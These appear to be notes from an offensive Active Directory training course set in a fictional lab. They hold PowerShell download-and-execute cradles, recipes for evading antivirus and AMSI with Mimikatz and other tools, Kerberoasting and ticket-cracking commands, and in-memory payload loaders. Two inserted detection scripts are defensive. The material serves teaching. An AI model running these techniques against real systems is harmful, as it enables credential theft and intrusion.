AD Advanced Notes


Cyber Bank

https://t.me/CyberBankSa -- All rights reserved to the Cyber Bank Initiative

Attacking and Defending Active Directory - Advanced Edition

Powered by INE: https://ine.com/
Altered Security: https://alteredsecurity.com/

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa



About me
• Twitter - @chiragsavla94
• Career - Senior Security Researcher at Altered Security
• Blog - https://3xpl01tc0d3r.blogspot.com/
• GitHub - https://github.com/3xpl01tc0d3r
• Creator of open source tools such as Process Injection, Callidus, etc.
• Interested in the offensive side of security such as penetration testing, red teaming, Azure, Active Directory security, and post-exploitation research.
• Spoken at multiple conferences and local meetups.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security.


Course Content
• Introduction to Active Directory
• Introduction to Attack methodology and tradecraft
• Domain Enumeration (Attacks and Defense)
• Enumerating information that would be useful in attacks while leaving a minimal footprint on the endpoints
• Understand and practice what properties and information to look for when preparing attack paths to avoid detection
• Enumerate trust relationships within and across forests to map cross trust attack paths
• Learn and practice escalating to local administrator privileges in the domain by abusing OU Delegation, Restricted Groups, LAPS, Nested group membership and hunting for privileges using remote access protocols
• Credential Replay Attacks


Course Content
• Evading application whitelisting (WDAC)
• Domain Privilege Escalation by abusing Unconstrained Delegation. Understand how unconstrained delegation is useful in compromising multiple high privilege servers and users in AD
• Abusing Constrained Delegation for Domain Privilege Escalation by impersonating high privilege accounts
• Using ACL permissions to abuse Resource-based Constrained Delegation
• Domain Persistence Techniques


Course Content
• Advanced Cross Domain attacks. Learn and practice attacks that allow escalation from Domain Admins to Enterprise Admins by abusing MS Products and delegation issues.
• User / Computer account takeover by leveraging Shadow Credentials.
• Lateral movement from on-prem to Azure AD by attacking Hybrid Identity infrastructure.
• Advanced Cross Forest attacks. Execute attacks like abuse of Kerberoast, SID Filtering misconfigurations etc. across forest trusts and understand the nuances of such attacks.


Course Content
• Abusing SQL Server for cross forest attacks
• More on advanced Cross Forest attacks like abuse of Foreign Security Principals, ACLs etc.
• Abusing PAM trust and shadow security principals to execute attacks against a managed forest.
• Detections and Defenses (Red Forest, JEA, PAW, LAPS, Selective Auth, Deception, App Whitelisting, MDI, Tiered Administration)
• Bypassing defenses like Advanced Threat Analytics, Protected Users Group, WDAC etc.


Goal
• The training expects knowledge of Active Directory security and familiarity with the Windows command line.
• This course introduces a concept, demonstrates how an attack can be executed and then has a Learning Objective section where students can practice in the lab.
• The lab, like a real world red team operation, forces you to use built-in tools as long as possible and focus on functionality abuse. So, in this course, we will NOT use any exploits or exploitation frameworks.
• We start from a foothold box as a normal domain user.
• Not everything is in the slides :)


Word of Caution
• In scope:
– 192.168.1.0/24 – 192.168.102.0/24, 192.168.100.X
– 192.168.1.199-192.168.1.200 are NOT in scope.
• Everything else is NOT in scope.
• Attacking out of scope machines may result in disqualification from the class.
• Please treat the lab network as a dangerous environment and take care of yourself!


Philosophy of the course

• We will emulate an adversary who has a foothold machine in the target domain.
• We will not use any exploit in the class but will depend on abuse of functionality and features which are rarely patched.
• We try to use the built-in tools and avoid touching disk as long as possible. We will not use any exploitation framework in the class.


Active Directory
• Directory Service used to manage Windows networks.
• Stores information about objects on the network and makes it easily available to users and admins.
• "Active Directory Domain Services (AD DS) enables centralized, secure management of an entire network, which might span a building, a city or multiple locations throughout the world."
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc780036(v=ws.10)


https://technet.microsoft.com/en-us/library/cc780036(v=ws.10).aspx


Active Directory - Components

• Schema – Defines objects and their attributes.
• Query and index mechanism – Provides searching and publication of objects and their properties.
• Global Catalog – Contains information about every object in the directory.
• Replication Service – Distributes information across domain controllers.


Active Directory - Structure

• Forests, domains and organizational units (OUs) are the basic building blocks of any Active Directory structure.
• A forest – which is a security boundary – may contain multiple domains and each domain may contain multiple OUs.


Attacking Active Directory

• In the class, we are going to abuse AD components and trusts and will not rely on ANY patchable exploits.
• No Unix or Linux tools or OS will be used, which increases our stealth and flexibility.


Tools
• C/C++/C# - Public code
• PowerShell - Built-in cmdlets, Microsoft Signed Modules, PowerShell Remoting, Public scripts and Custom scripts.
• Windows native executables


PowerShell Script Execution

• Download execute cradle
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')

$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response

PSv3 onwards - iex (iwr 'http://192.168.230.1/evil.ps1')

$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex $h.responseText

$wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()


Check out Invoke-CradleCrafter: https://github.com/danielbohannon/Invoke-CradleCrafter


PowerShell and AD
• [ADSI]
• .NET Classes - System.DirectoryServices.ActiveDirectory
• Native Executables
• WMI using PowerShell
• ActiveDirectory Module


PowerShell Detections
• System-wide transcription
• Script Block logging
• Antimalware Scan Interface (AMSI)
• Constrained Language Mode (CLM) - Integrated with AppLocker and WDAC (Device Guard)
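The download cradles on the "PowerShell Script Execution" slide and the Script Block Logging control listed here are two sides of one detection. The following Python is an added example, not course material: it triages constructed Event ID 4104 records, reassembling multi-part blocks by ScriptBlockId and flagging a cradle only when a fetch primitive and iex/Invoke-Expression share one block, and it also flags the [regex] RightToLeft string reversal used on the later signature-evasion slides. The field names are the real 4104 fields; the sample events, hosts and verdict labels are constructed.

```python
"""Triage PowerShell Script Block Logging (Event ID 4104) text for download cradles.

Added example, not course material: it flags the cradle shapes shown on the
'PowerShell Script Execution' slide (Net.WebClient DownloadString, iwr, Msxml2.XMLHTTP,
InternetExplorer.Application, WebRequest GetResponseStream) when they share a block
with iex/Invoke-Expression, and the [regex] RightToLeft string reversal used on the
signature-evasion slides. Records use the real 4104 fields ScriptBlockId,
MessageNumber, MessageTotal and ScriptBlockText; the sample events are constructed.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

# Network primitives that return script text; any one of them can feed a cradle.
FETCH_PATTERNS = {
    "WebClient.DownloadString": re.compile(r"Net\.WebClient.*?\.DownloadString\(", re.I | re.S),
    "Invoke-WebRequest": re.compile(r"(?<![\w-])(iwr|Invoke-WebRequest)\b", re.I),
    "Msxml2.XMLHTTP": re.compile(r"Msxml2\.XMLHTTP", re.I),
    "InternetExplorer.Application": re.compile(r"InternetExplorer\.Application", re.I),
    "WebRequest.GetResponseStream": re.compile(r"\.GetResponseStream\(\)", re.I),
}
# Execution of the fetched text; iex is the built-in alias of Invoke-Expression.
EXEC_PATTERN = re.compile(r"(?<![\w-])(iex|Invoke-Expression)\b", re.I)
# Reversed-string decoding: [regex]::Matches($s,'.','RightToLeft') ... -join ''
REVERSE_PATTERN = re.compile(r"\[regex\]::Matches\(.*?RightToLeft.*?-join", re.I | re.S)


@dataclass
class Finding:
    script_block_id: str
    fetch_methods: list[str]
    executes_text: bool
    reverses_strings: bool
    verdict: str


def reassemble(records: list[dict]) -> dict[str, str]:
    """Join multi-part 4104 records. Long blocks are split across MessageTotal events
    that share one ScriptBlockId; scanning the parts separately can miss a cradle
    whose fetch and iex land in different parts."""
    parts: dict[str, dict[int, str]] = defaultdict(dict)
    for rec in records:
        parts[rec["ScriptBlockId"]][int(rec["MessageNumber"])] = rec["ScriptBlockText"]
    return {sbid: "".join(p[n] for n in sorted(p)) for sbid, p in parts.items()}


def classify(script_block_id: str, text: str) -> Finding:
    fetch = [name for name, rx in FETCH_PATTERNS.items() if rx.search(text)]
    executes = bool(EXEC_PATTERN.search(text))
    reverses = bool(REVERSE_PATTERN.search(text))
    if fetch and executes:
        verdict = "download-cradle"              # fetch and execute in one block
    elif reverses:
        verdict = "string-reversal-obfuscation"  # decoding of reversed literals
    elif fetch:
        verdict = "network-fetch"                # common in legitimate scripts; low priority
    else:
        verdict = "benign"
    return Finding(script_block_id, fetch, executes, reverses, verdict)


def analyze(records: list[dict]) -> list[Finding]:
    return [classify(sbid, text) for sbid, text in reassemble(records).items()]


# Constructed sample events; hosts and IDs are not from the course lab.
SAMPLE_4104 = [
    {"ScriptBlockId": "a1", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "iex (New-Object Net.WebClient).DownloadString('http://192.0.2.10/p.ps1')"},
    # Block b2 arrives as two parts, out of order: fetch in part 1, iex in part 2.
    {"ScriptBlockId": "b2", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": "$h.send();iex $h.responseText"},
    {"ScriptBlockId": "b2", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://192.0.2.10/p.ps1',$false);"},
    {"ScriptBlockId": "c3", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "$s='stekcoS.teN';$c=([regex]::Matches($s,'.','RightToLeft')|%{$_.value}) -join ''"},
    {"ScriptBlockId": "d4", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Invoke-WebRequest -Uri https://example.org/status -OutFile C:\\temp\\status.json"},
    {"ScriptBlockId": "e5", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-ADUser -Filter * -Properties MemberOf"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_4104):
        print(f"{f.script_block_id}: {f.verdict:27} fetch={f.fetch_methods} iex={f.executes_text}")
```

This only works while Script Block Logging is intact: the Invisi-Shell slides that follow describe hooking the logging assemblies, so a host that should emit 4104 events but goes quiet is itself worth an alert.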


15 ways to bypass PowerShell execution policy
https://www.netspi.com/blog/entryid/238/15-ways-to-bypass-the-powershell-execution-policy


PowerShell Tradecraft
• Offensive PowerShell is not dead.
• The detections depend on your target organization and on whether you are using customized code.
• There are bypasses and then there are obfuscated bypasses!
• Remember, the focus of the class is Active Directory :)


Bypassing PowerShell Security

• We will use Invisi-Shell (https://github.com/OmerYa/Invisi-Shell) for bypassing the security controls in PowerShell.
• The tool hooks the .NET assemblies (System.Management.Automation.dll and System.Core.dll) to bypass logging.
• It uses a CLR Profiler API to perform the hook.
• "A common language runtime (CLR) profiler is a dynamic link library (DLL) that consists of functions that receive messages from, and send messages to, the CLR by using the profiling API. The profiler DLL is loaded by the CLR at run time."


https://github.com/OmerYa/Invisi-Shell/blob/master/InvisiShellProfier/InvisiShellProfiler.cpp
https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview


Bypassing PowerShell Security

Using Invisi-Shell
• With admin privileges:
RunWithPathAsAdmin.bat

• With non-admin privileges:
RunWithRegistryNonAdmin.bat

• Type exit from the new PowerShell session to complete the clean-up.


Bypassing AV Signatures for PowerShell

• We can always load scripts in memory and avoid detection using an AMSI bypass.
• How do we bypass signature-based detection of on-disk PowerShell scripts by Windows Defender?
• We can use the AMSITrigger (https://github.com/RythmStick/AMSITrigger) tool to identify the exact part of a script that is detected by AMSI.
• We can use DefenderCheck (https://github.com/t3hbb/DefenderCheck) to identify code and strings from a binary / file that Windows Defender may flag.
• Simply provide the path to the script file to scan it:
AmsiTrigger_x64.exe -i C:\AD\Tools\Invoke-PowerShellTcp_Detected.ps1
DefenderCheck.exe PowerUp.ps1
• For full obfuscation of PowerShell scripts, see Invoke-Obfuscation (https://github.com/danielbohannon/Invoke-Obfuscation). That is used for obfuscating the AMSI bypass in the course!


Bypassing AV Signatures for PowerShell

• Steps to avoid signature-based detection are pretty simple:
1) Scan using AMSITrigger
2) Modify the detected code snippet
3) Rescan using AMSITrigger
4) Repeat steps 2 & 3 until we get a result of "AMSI_RESULT_NOT_DETECTED" or "Blank"


Bypassing AV Signatures for PowerShell - PowerUp
• Scan using AMSITrigger


Bypassing AV Signatures for PowerShell - PowerUp
• Reverse the "System.AppDomain" string on line number 59
$String = 'niamoDppA.metsyS'
$classrev = ([regex]::Matches($String,'.','RightToLeft') | ForEach {$_.value}) -join ''
$AppDomain = [Reflection.Assembly].Assembly.GetType("$classrev").GetProperty('CurrentDomain').GetValue($null, @())
• Check again with AMSITrigger


Bypassing AV Signatures for PowerShell - PowerUp
• Scan using DefenderCheck


Bypassing AV Signatures for PowerShell - PowerUp
• Reverse the value of the variables "$DllBytes32" & "$DllBytes64"
• Rescan using DefenderCheck


Bypassing AV Signatures for PowerShell - Invoke-PowerShellTcp
• Scan using AMSITrigger


Bypassing AV Signatures for PowerShell - Invoke-PowerShellTcp
• Reverse the "Net.Sockets" string on line number 32
$String = "stekcoS.teN"
$class = ([regex]::Matches($String,'.','RightToLeft') | ForEach {$_.value}) -join ''
if ($Reverse)
{
$client = New-Object System.$class.TCPClient($IPAddress,$Port)
}
• Check again with AMSITrigger!


Bypassing AV Signatures for PowerShell - Invoke-Mimikatz
• Invoke-Mimikatz is THE most heavily signatured PowerShell script!
• We must rename it before scanning with AmsiTrigger or we get an access denied.


Bypassing AV Signatures for PowerShell - Invoke-Mimikatz
• There are multiple detections. We need to make the following changes:
1) Remove the comments.
2) Modify each use of "DumpCreds".
3) Modify the variable names of the Win32 API calls that are detected.
4) Reverse the strings that are detected and the Mimikatz Compressed DLL string.


Bypassing AV Signatures for PowerShell - Invoke-Mimikatz
2. Modify each use of "DumpCreds". We changed it to "DC".


Bypassing AV Signatures for PowerShell - Invoke-Mimikatz
3. Modify the variable names of the Win32 API calls that are detected - "VirtualProtect", "WriteProcessMemory" and "CreateRemoteThread"


Bypassing AV Signatures for PowerShell - Invoke-Mimikatz
4. Reverse the strings that are detected and the Mimikatz Compressed DLL string.


Methodology - Assume Breach

"It is more likely that an organization has already been compromised, but just
hasn't discovered it yet."


Microsoft Cloud Red Teaming Paper: https://gallery.technet.microsoft.com/Cloud-Red-Teaming-b837392


Insider Attack Simulation


The Lab Environment

• We target the Active Directory environment of a fictional critical tech company called 'Techcorp'.
• Techcorp has segregated its AD into multiple forests across departments, locations and vendors. It has
– (Almost) fully patched Server 2019 machines.
– Server 2016 Forest Functional Level (There is nothing called Server 2019 Forest Functional Level).
– Multiple forests and multiple domains.
– Minimal firewall usage so that we focus more on concepts.
• On student machines, you can find all the tools in the C:\AD directory. It is exempted from Windows Defender.

Domain Enumeration
• For enumeration we can use the following tools
− The ActiveDirectory PowerShell module (MS signed and works even in PowerShell CLM)
https://docs.microsoft.com/en-us/powershell/module/addsadministration/?view=win10-ps
https://github.com/samratashok/ADModule

Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1

− BloodHound (C# and PowerShell Collectors)
https://github.com/BloodHoundAD/BloodHound

− PowerView (PowerShell)
https://github.com/ZeroDayLab/PowerSploit/blob/master/Recon/PowerView.ps1

. C:\AD\Tools\PowerView.ps1

− SharpView (C#) - Doesn't support filtering using the pipeline
https://github.com/tevora-threat/SharpView/

https://janikvonrotz.ch/2015/09/09/deploy-powershell-activedirectory-module-without-installing-the-remote-server-tools/
https://www.labofapenetrationtester.com/2018/10/domain-enumeration-from-PowerShell-CLM.html


Domain Enumeration - BloodHound

• Useful tool for penetration testers and blue teams.
• Provides a GUI for AD entities and relationships for the data collected by its ingestors.
• Uses graph theory to map the shortest path to interesting targets like Domain Admins.
• There are built-in queries for frequently used actions.
• Also supports custom Cypher queries.


Domain Enumeration - BloodHound

• Run Ingestors/Collectors using PowerShell or C#:
. C:\AD\Tools\BloodHound-master\Collectors\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
or
SharpHound.exe
• The generated files can be uploaded to the BloodHound application.
• To avoid tools (like MDI) that alert on session enumeration on DCs:
Invoke-BloodHound -CollectionMethod All -ExcludeDomainControllers


Find-GPOComputerAdmin -OUName 'OU=Mgmt,DC=us,DC=techcorp,DC=local'
The above command from the older PowerView version works fine.


Reference: https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-model


Reference: https://docs.microsoft.com/en-us/windows/win32/secauthz/interaction-between-threads-and-securable-objects


Reference: https://docs.microsoft.com/en-us/windows/win32/secauthz/dacls-and-aces


Active Directory Rights: https://msdn.microsoft.com/en-us/library/system.directoryservices.activedirectoryrights(v=vs.110).aspx
Extended Rights: https://technet.microsoft.com/en-us/library/ff405676.aspx


Reference: https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx

Privilege Escalation
• In an AD environment, there are multiple scenarios which lead to privilege escalation. We had a look at the following:
– Hunting for Local Admin access on other machines
– Hunting for high privilege domain accounts (like a Domain Administrator)
• Let's also look for Local Privilege Escalation.


NTLM Relaying example - https://github.com/antonioCoco/RemotePotato0


Privilege Escalation
• Let's start actively looking for the ability to access other users or machines in the domain. This will be a mix of Privilege escalation, Admin Recon and Lateral movement.


https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin%281%29.pdf


Request a ticket using .NET classes

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "USSvc/serviceaccount"

Invoke-Kerberoast from BC Empire (https://github.com/BC-SECURITY/Empire) can be used as well; its output is in a format that can be cracked with John or Hashcat.

. .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -Identity serviceaccount


Crack ticket using tgsrepcrack

Check if the ticket has been granted:
klist.exe

Export all tickets using Mimikatz:
Invoke-Mimikatz -Command '"kerberos::list /export"'

Crack the service account password:
python.exe .\tgsrepcrack.py .\10k-worst-passwords.txt '.\2-40a10000-studentuser@USSvc~serviceaccount-US.TECHCORP.LOCAL.kirbi'
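A defender's counterpart to the two slides above, added here and not taken from the course or from the tools it references: detection logic run over constructed Windows Security event 4769 (service ticket requested) records, flagging RC4 (0x17) tickets issued for user-account SPNs and a burst of distinct SPN requests from one principal. Field names follow the 4769 EventData; the event values, account names and thresholds are assumptions.

```python
"""Detect Kerberoast-style TGS requests in Windows Security event 4769 records.

Added example for this section, not code from the course or from any tool it
references. It assumes events have been exported (for example from a SIEM) as
dicts whose keys match the 4769 EventData field names. Every sample event
below is constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # TicketEncryptionType reported for RC4-HMAC tickets
SUCCESS = "0x0"     # Status (result code) of a granted ticket

# Constructed sample: one requester pulling several user-account SPNs with RC4,
# plus benign machine-account / AES traffic and a failed request that must not alert.
SAMPLE_EVENTS = [
    {"TimeCreated": "2023-05-01T09:00:01", "TargetUserName": "studentuser@US.TECHCORP.LOCAL",
     "ServiceName": "US-FS$", "TicketEncryptionType": "0x12", "Status": SUCCESS,
     "IpAddress": "192.168.100.50"},
    {"TimeCreated": "2023-05-01T09:05:10", "TargetUserName": "studentuser@US.TECHCORP.LOCAL",
     "ServiceName": "serviceaccount", "TicketEncryptionType": RC4_HMAC, "Status": SUCCESS,
     "IpAddress": "192.168.100.50"},
    {"TimeCreated": "2023-05-01T09:05:11", "TargetUserName": "studentuser@US.TECHCORP.LOCAL",
     "ServiceName": "sqlsvc", "TicketEncryptionType": RC4_HMAC, "Status": SUCCESS,
     "IpAddress": "192.168.100.50"},
    {"TimeCreated": "2023-05-01T09:05:12", "TargetUserName": "studentuser@US.TECHCORP.LOCAL",
     "ServiceName": "httpsvc", "TicketEncryptionType": RC4_HMAC, "Status": SUCCESS,
     "IpAddress": "192.168.100.50"},
    {"TimeCreated": "2023-05-01T09:05:13", "TargetUserName": "studentuser@US.TECHCORP.LOCAL",
     "ServiceName": "krbtgt", "TicketEncryptionType": RC4_HMAC, "Status": SUCCESS,
     "IpAddress": "192.168.100.50"},
    {"TimeCreated": "2023-05-01T09:30:00", "TargetUserName": "backupadmin@US.TECHCORP.LOCAL",
     "ServiceName": "sqlsvc", "TicketEncryptionType": "0x12", "Status": SUCCESS,
     "IpAddress": "192.168.100.60"},
    {"TimeCreated": "2023-05-01T09:40:00", "TargetUserName": "US-WS01$@US.TECHCORP.LOCAL",
     "ServiceName": "US-FS$", "TicketEncryptionType": RC4_HMAC, "Status": SUCCESS,
     "IpAddress": "192.168.100.70"},
    {"TimeCreated": "2023-05-01T09:41:00", "TargetUserName": "studentuser@US.TECHCORP.LOCAL",
     "ServiceName": "ldapsvc", "TicketEncryptionType": RC4_HMAC, "Status": "0x1b",
     "IpAddress": "192.168.100.50"},
]


def is_user_spn(service_name):
    """Kerberoast targets are SPNs tied to user accounts: machine accounts end
    in '$' and krbtgt tickets are TGT traffic, so both are excluded."""
    account = service_name.split("/", 1)[0].split("@", 1)[0]
    return not account.endswith("$") and account.lower() != "krbtgt"


def detect_kerberoast(events, burst_threshold=3, window=timedelta(minutes=1)):
    """Return alerts for (a) RC4 tickets granted for user-account SPNs and
    (b) one requester obtaining tickets for >= burst_threshold distinct
    user-account SPNs within `window` (mass requests as made by
    Invoke-Kerberoast without -Identity)."""
    alerts = []
    by_requester = defaultdict(list)
    for ev in events:
        if ev.get("Status") != SUCCESS or not is_user_spn(ev["ServiceName"]):
            continue
        ts = datetime.fromisoformat(ev["TimeCreated"])
        if ev.get("TicketEncryptionType") == RC4_HMAC:
            alerts.append({"rule": "rc4_ticket_for_user_spn",
                           "requester": ev["TargetUserName"],
                           "services": [ev["ServiceName"]],
                           "source_ip": ev.get("IpAddress"),
                           "time": ev["TimeCreated"]})
        by_requester[ev["TargetUserName"]].append((ts, ev["ServiceName"], ev.get("IpAddress")))
    for requester, reqs in by_requester.items():
        reqs.sort(key=lambda r: r[0])
        for i, (start, _, ip) in enumerate(reqs):
            in_window = [r for r in reqs[i:] if r[0] - start <= window]
            services = sorted({r[1] for r in in_window})
            if len(services) >= burst_threshold:
                alerts.append({"rule": "spn_request_burst", "requester": requester,
                               "services": services, "source_ip": ip,
                               "time": start.isoformat()})
                break  # one burst alert per requester is enough
    return alerts


def alert_counts(alerts):
    """Count alerts per rule (useful for tuning thresholds against real data)."""
    counts = defaultdict(int)
    for alert in alerts:
        counts[alert["rule"]] += 1
    return dict(counts)


if __name__ == "__main__":
    for alert in detect_kerberoast(SAMPLE_EVENTS):
        print(alert["rule"], alert["requester"], alert["services"], alert["source_ip"])
```

The RC4 rule alone is noisy in domains that still allow RC4 for service accounts; the burst rule is the one that survives once the environment is AES-only.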


Reference: http://www.harmj0y.net/blog/activedirectory/targeted-kerberoasting/


LAPS intro: https://docs.microsoft.com/en-us/previous-versions/mt227395(v=msdn.10)


Powerview command reference - https://www.harmj0y.net/blog/powershell/running-laps-with-powerview/


For abusing LAPS for persistence, see: https://rastamouse.me/2018/03/laps---part-2/
https://2017.hack.lu/archive/2017/HackLU_2017_Malicious_use_LAPS_Clementz_Goichot.pdf


https://github.com/gentilkiwi/mimikatz
Unofficial mimikatz guide: https://adsecurity.org/?p=2207


https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them
https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1
https://github.com/b4rtik/SharpKatz
https://github.com/outflanknl/Dumpert
https://github.com/Flangvik/BetterSafetyKatz
https://github.com/GhostPack/SafetyKatz
https://github.com/deepinstinct/Lsass-Shtinkering


https://github.com/skelsec/pypykatz
https://github.com/Hackndo/lsassy
https://github.com/SecureAuthCorp/impacket/
https://github.com/FSecureLABS/physmem2profit


https://github.com/deepinstinct/Lsass-Shtinkering


Reference for logon types: https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them


https://github.com/GhostPack/Rubeus/


Offensive .NET - Introduction

• Currently, .NET lacks some of the security features implemented in System.Management.Automation.dll.
• Because of this, many Red teams have included .NET in their tradecraft.
• There are many open source Offensive .NET tools and we will use the ones that fit our attack methodology.


A repo of popular Offensive C# tools - https://github.com/Flangvik/SharpCollection


Offensive .NET - Tradecraft

• When using .NET (or any other compiled language) there are some challenges:
– Detection by countermeasures like AV, EDR etc.
– Delivery of the payload (recall PowerShell's sweet download-execute cradles)
– Detection by logging like process creation logging, command line logging etc.
• We will try and address the AV detection and delivery of the payload as and when required during the class ;)
• You are on your own when the binaries that we share start getting detected by Windows Defender!


Offensive .NET - Tradecraft - AV bypass

• We will focus mostly on bypass of signature based detection by Windows Defender.
• For that, we can use techniques like Obfuscation, String Manipulation etc.
• We can use DefenderCheck (https://github.com/t3hbb/DefenderCheck) to identify code and strings from a binary / file that Windows Defender may flag.
• This helps us decide which parts of the source code to modify, keeping obfuscation minimal.


Offensive .NET - Tradecraft - AV bypass - DefenderCheck

• Let's check SharpKatz.exe for signatures using DefenderCheck
DefenderCheck.exe <Path to Sharpkatz binary>


Offensive .NET - Tradecraft - AV bypass - String Manipulation

• Open the project in Visual Studio.
• Press "CTRL + H".
• Find and replace the string "Credentials" with "Credents"; you can use any other string as a replacement (make sure that string is not already present in the code).
• Select the scope as "Entire Solution".
• Press the "Replace All" button.
• Build and recheck the binary with DefenderCheck.
• Repeat the above steps if the binary is still detected.


Offensive .NET - Tradecraft - AV bypass - String Manipulation

For SafetyKatz, we used the following steps:
• Download the latest version of Mimikatz and Out-CompressedDll.ps1
• Run the Out-CompressedDll.ps1 PowerShell script on the Mimikatz binary and save the output to a file.
Out-CompressedDll <Path to mimikatz.exe> > outputfilename.txt


https://github.com/gentilkiwi/mimikatz
https://github.com/PowerShellMafia/PowerSploit/blob/master/ScriptModification/Out-CompressedDll.ps1


Offensive .NET - Tradecraft - AV bypass - String Manipulation

• Copy the value of the variable "$EncodedCompressedFile" from the output file above and replace the value of the "compressedMimikatzString" variable in the "Constants.cs" file of SafetyKatz.


Offensive .NET - Tradecraft - AV bypass - String Manipulation

• Copy the byte size from the output file and replace it in the "Program.cs" file on lines 111 & 116.
• Build and recheck the binary with DefenderCheck.


Offensive .NET - Tradecraft - AV bypass - BetterSafetyKatz

For BetterSafetyKatz, we used the following steps:
• Download the latest release of the "mimikatz_trunk.zip" file.
• Convert the file to its base64 value.


Offensive .NET - Tradecraft - AV bypass - BetterSafetyKatz

• Modify the "Program.cs" file:
– Add a new variable that contains the base64 value of the "mimikatz_trunk.zip" file.
– Comment out the code that downloads the mimikatz file or accepts it as an argument.
– Convert the base64 string to bytes and pass it to the "zipStream" variable.


Offensive .NET - Tradecraft - AV bypass - Obfuscation

• For Rubeus.exe, we used ConfuserEx (https://github.com/mkaring/ConfuserEx) to obfuscate the binary.


Offensive .NET - Tradecraft - AV bypass - Obfuscation

Launch ConfuserEx
• In the Project tab, select the Base Directory where the binary file is located.
• In the Project tab, select the binary file that we want to obfuscate.
• In the Settings tab, add the rules.
• In the Settings tab, edit the rule and select the preset as `Normal`.
• In the Protect tab, click on the Protect button.

We will find the new obfuscated binary in the Confused folder under the Base Directory.


Offensive .NET - Tradecraft - AV bypass - Obfuscation

• After obfuscating the binary with ConfuserEx and rescanning it with DefenderCheck, we can see that the GUID is still detected.


Offensive .NET - Tradecraft - AV bypass - Obfuscation

• Generate and modify the GUID, compile Rubeus again and rerun ConfuserEx on the Rubeus.exe binary.


Offensive .NET - Tradecraft - Payload Delivery

• We can use NetLoader (https://github.com/Flangvik/NetLoader) to deliver our binary payloads.
• It can be used to load a binary from a filepath or URL and patch AMSI & ETW while executing.
C:\Users\Public\Loader.exe -path http://192.168.100.X/SafetyKatz.exe

• We also have AssemblyLoad.exe that can be used to load the NetLoader in-memory from a URL, which then loads a binary from a filepath or URL.
C:\Users\Public\AssemblyLoad.exe http://192.168.100.X/Loader.exe -path http://192.168.100.X/SafetyKatz.exe


https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview


https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e



Golden gMSA
• The gMSA password is calculated by leveraging the secret stored in the KDS root key object.
• We need the following attributes of the KDS root key to compute the Group Key Envelope (GKE):
– cn
– msKds-SecretAgreementParam
– msKds-RootKeyData
– msKds-KDFParam
– msKds-KDFAlgorithmID
– msKds-CreateTime
– msKds-UseStartTime
– msKds-Version
– msKds-DomainID
– msKds-PrivateKeyLength
– msKds-PublicKeyLength
– msKds-SecretAgreementAlgorithmID


https://www.semperis.com/blog/golden-gmsa-attack/


Golden gMSA
• Once we compute the GKE for the associated KDS root key, we can generate the password offline.
• Only privileged accounts such as Domain Admins, Enterprise Admins or SYSTEM can retrieve the KDS root key.
• Once the KDS root key is compromised, we can't protect the associated gMSA accounts.
• Golden gMSA can be used to retrieve the gMSA account information and the KDS root key, and to generate the password offline.


Domain Privilege Escalation

• So we have administrative access to studentuserx, us-mgmt, us-mailmgmt, us-jump and us-web!
• We are now ready to escalate privileges to Domain Admin!


https://labs.mwrinfosecurity.com/blog/trust-years-to-earn-seconds-to-break/
http://www.labofapenetrationtester.com/2016/02/getting-domain-admin-with-kerberos-unconstrained-delegation.html
https://adsecurity.org/?p=1667
http://blogs.msdn.com/b/autz_auth_stuff/archive/2011/05/03/kerberos-delegation.aspx


https://www.slideshare.net/harmj0y/derbycon-the-unintended-risks-of-trusting-active-directory/41
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1
http://www.harmj0y.net/blog/redteaming/not-a-security-boundary-breaking-forest-trusts/


https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-
efsr/08796ba8-01c8-4872-9221-1000ec2eff31

https://github.com/p0dalirius/Coercer
https://github.com/ShutdownRepo/ShadowCoerce
https://github.com/Wh04m1001/DFSCoerce
https://github.com/crisprss/magicNetdefs


https://www.coresecurity.com/blog/kerberos-delegation-spns-and-more


https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html


